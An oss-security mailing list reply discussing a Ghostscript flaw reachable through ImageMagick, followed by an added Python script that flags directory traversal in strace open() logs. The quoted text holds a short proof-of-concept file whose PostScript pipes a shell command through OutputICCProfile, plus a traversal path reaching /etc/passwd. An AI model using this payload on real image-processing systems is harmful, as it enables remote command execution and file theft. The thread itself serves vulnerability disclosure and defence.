Date: Fri, 30 Sep 2016 15:58:25 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: Florian Weimer <fw@...eb.enyo.de>
Cc: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Fri, Sep 30, 2016 at 2:11 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
> * Tavis Ormandy:
>>
>> $ cat test.gif
>> currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
>> .putdeviceparams
>> quit
>> $ convert test.gif png:test.png
>>
>> (Note: I don't know why it doesn't work on earlier versions, maybe
>> it's possible to make it work, or some other param will work)
>
> It still tries to open a file in earlier versions, with directory
> traversal:
>
> [pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
>
> The %pipe%-based execution was introduced as a side effect of:
>

Thanks Florian! I took a look at where that directory comes from; I think
it pulls it from a userparam, like:

<< (ICCProfilesDir) (whatever) >> .setuserparams

That probably needs to be fixed. I wonder if there's a way to get that
directory to populate back into the PermitFileReading array?

Tavis.
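
Added example, not part of the original message and not Ghostscript code: a check that reads strace output such as the line Florian quoted and classifies each opened path against an allow-list of directories, flagging paths that start inside an allowed directory but normalize to somewhere else. The allow-list and the second and third log lines are constructed for illustration; normalization is lexical only, so symlinks are not followed.

```python
import posixpath
import re

# Matches strace open()/openat() lines and captures the quoted path argument.
OPEN_RE = re.compile(r'\bopen(?:at)?\((?:\w+, )?"([^"]*)"')


def inside(path, base):
    """True if path is base itself or lies below it (component-wise, not substring)."""
    base = base.rstrip("/")
    return path == base or path.startswith(base + "/")


def classify_opens(strace_text, allowed_dirs):
    """Return (verdict, normalized_path) for every open call in the log.

    ok        - normalized path is inside an allowed directory
    traversal - raw string starts inside an allowed directory, but ".."
                components carry it outside once normalized
    outside   - path never pointed into an allowed directory
    """
    results = []
    for line in strace_text.splitlines():
        m = OPEN_RE.search(line)
        if not m:
            continue
        raw = m.group(1)
        norm = posixpath.normpath(raw)  # lexical: collapses "." and ".."
        if any(inside(norm, d) for d in allowed_dirs):
            verdict = "ok"
        elif any(inside(raw, d) for d in allowed_dirs):
            verdict = "traversal"
        else:
            verdict = "outside"
        results.append((verdict, norm))
    return results


# First line is the one quoted in the thread; the other two are constructed.
SAMPLE = """\
[pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/../../../../../etc/passwd", O_RDONLY) = 5
[pid 29607] open("/usr/share/ghostscript/9.06/iccprofiles/default_rgb.icc", O_RDONLY) = 4
[pid 29607] openat(AT_FDCWD, "/tmp/magick-abc", O_RDWR) = 3
"""
# Assumed allow-list for this example only.
ALLOWED = ["/usr/share/ghostscript/9.06/iccprofiles"]

if __name__ == "__main__":
    for verdict, norm in classify_opens(SAMPLE, ALLOWED):
        print(f"{verdict:10} {norm}")
```

A check that compares only the raw string prefix would accept the first line; comparing the normalized path is what exposes it.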
